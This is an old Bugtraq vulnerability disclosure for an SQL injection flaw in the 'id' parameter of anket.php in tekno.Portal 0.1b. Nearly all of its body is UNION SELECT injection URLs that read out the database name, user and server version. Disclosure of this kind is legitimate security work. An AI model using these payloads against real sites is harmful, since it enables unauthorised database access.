
Date: Thu, 26 Jul 2012 00:21:29 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: tekno.Portal 0.1b - SQLi Vulnerability in "anket.php"

____________________________________________________________________________________


        ################################################################
        # Title: tekno.Portal 0.1b - SQLi Vulnerability in "anket.php" #
        ################################################################


Date: [07-25-2012]

Author: Socket_0x03 (Alvaro J. Gene)

Email: Socket_0x03@...aexe.com

Website: www.teraexe.com 

____________________________________________________________________________________


Vulnerable Application: tekno.Portal

Version: 0.1b

File: anket.php

____________________________________________________________________________________


SQL Injection: 
 http://www.website.com/teknoportal/anket.php?id=[SQLi]

Example of SQLi: 
 http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,database(),5
 http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,user(),5
 http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@version,5

____________________________________________________________________________________
